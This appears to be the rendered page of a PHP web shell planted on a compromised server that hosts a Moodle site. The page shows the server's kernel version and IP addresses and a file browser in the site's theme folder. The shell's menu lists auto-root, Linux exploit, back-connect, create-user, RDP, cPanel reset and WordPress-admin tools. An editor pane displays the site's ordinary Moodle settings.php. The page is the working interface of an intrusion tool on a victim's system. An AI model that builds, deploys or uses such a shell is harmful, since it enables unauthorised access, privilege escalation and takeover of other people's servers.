Linux aries.aptans.com 4.18.0-348.20.1.lve.1.el8.x86_64 #1 SMP Wed Mar 16 08:45:39 EDT 2022 x86_64
Apache
: 135.181.142.107 | : 108.162.216.82
Cant Read [ /etc/named.conf ]
7.4.33
aja
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
aja /
public_html /
ead.aptans /
theme /
classic /
[ HOME SHELL ]
Name
Size
Permission
Action
classes
[ DIR ]
drwxr-xr-x
lang
[ DIR ]
drwxr-xr-x
layout
[ DIR ]
drwxr-xr-x
pix
[ DIR ]
drwxr-xr-x
scss
[ DIR ]
drwxr-xr-x
style
[ DIR ]
drwxr-xr-x
templates
[ DIR ]
drwxr-xr-x
tests
[ DIR ]
drwxr-xr-x
config.php
5.48
KB
-rw-rw-r--
lib.php
4.59
KB
-rw-rw-r--
settings.php
4.33
KB
-rw-rw-r--
version.php
1.09
KB
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : settings.php
<?php // This file is part of Moodle - http://moodle.org/ // // Moodle is free software: you can redistribute it and/or modify // it under the terms of the GNU General Public License as published by // the Free Software Foundation, either version 3 of the License, or // (at your option) any later version. // // Moodle is distributed in the hope that it will be useful, // but WITHOUT ANY WARRANTY; without even the implied warranty of // MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the // GNU General Public License for more details. // // You should have received a copy of the GNU General Public License // along with Moodle. If not, see <http://www.gnu.org/licenses/>. /** * Classic theme settings file. * * @package theme_classic * @copyright 2018 Bas Brands * @license http://www.gnu.org/copyleft/gpl.html GNU GPL v3 or later */ defined('MOODLE_INTERNAL') || die; if ($ADMIN->fulltree) { $settings = new theme_boost_admin_settingspage_tabs('themesettingclassic', get_string('configtitle', 'theme_classic')); $page = new admin_settingpage('theme_classic_general', get_string('generalsettings', 'theme_boost')); $name = 'theme_classic/navbardark'; $title = get_string('navbardark', 'theme_classic'); $description = get_string('navbardarkdesc', 'theme_classic'); $setting = new admin_setting_configcheckbox($name, $title, $description, 0); $setting->set_updatedcallback('theme_reset_all_caches'); $page->add($setting); // Preset. $name = 'theme_classic/preset'; $title = get_string('preset', 'theme_classic'); $description = get_string('preset_desc', 'theme_classic'); $default = 'default.scss'; $context = context_system::instance(); $fs = get_file_storage(); $files = $fs->get_area_files($context->id, 'theme_classic', 'preset', 0, 'itemid, filepath, filename', false); $choices = []; foreach ($files as $file) { $choices[$file->get_filename()] = $file->get_filename(); } // These are the built in presets. $choices['default.scss'] = 'default.scss'; $choices['plain.scss'] = 'plain.scss'; $setting = new admin_setting_configthemepreset($name, $title, $description, $default, $choices, 'classic'); $setting->set_updatedcallback('theme_reset_all_caches'); $page->add($setting); // Preset files setting. $name = 'theme_classic/presetfiles'; $title = get_string('presetfiles', 'theme_classic'); $description = get_string('presetfiles_desc', 'theme_classic'); $setting = new admin_setting_configstoredfile($name, $title, $description, 'preset', 0, array('maxfiles' => 20, 'accepted_types' => array('.scss'))); $page->add($setting); // Background image setting. $name = 'theme_classic/backgroundimage'; $title = get_string('backgroundimage', 'theme_boost'); $description = get_string('backgroundimage_desc', 'theme_boost'); $setting = new admin_setting_configstoredfile($name, $title, $description, 'backgroundimage'); $setting->set_updatedcallback('theme_reset_all_caches'); $page->add($setting); // Variable $body-color. // We use an empty default value because the default colour should come from the preset. $name = 'theme_classic/brandcolor'; $title = get_string('brandcolor', 'theme_boost'); $description = get_string('brandcolor_desc', 'theme_boost'); $setting = new admin_setting_configcolourpicker($name, $title, $description, ''); $setting->set_updatedcallback('theme_reset_all_caches'); $page->add($setting); // Must add the page after definiting all the settings! $settings->add($page); // Advanced settings. $page = new admin_settingpage('theme_classic_advanced', get_string('advancedsettings', 'theme_boost')); // Raw SCSS to include before the content. $setting = new admin_setting_scsscode('theme_classic/scsspre', get_string('rawscsspre', 'theme_boost'), get_string('rawscsspre_desc', 'theme_boost'), '', PARAM_RAW); $setting->set_updatedcallback('theme_reset_all_caches'); $page->add($setting); // Raw SCSS to include after the content. $setting = new admin_setting_scsscode('theme_classic/scss', get_string('rawscss', 'theme_boost'), get_string('rawscss_desc', 'theme_boost'), '', PARAM_RAW); $setting->set_updatedcallback('theme_reset_all_caches'); $page->add($setting); $settings->add($page); }
Close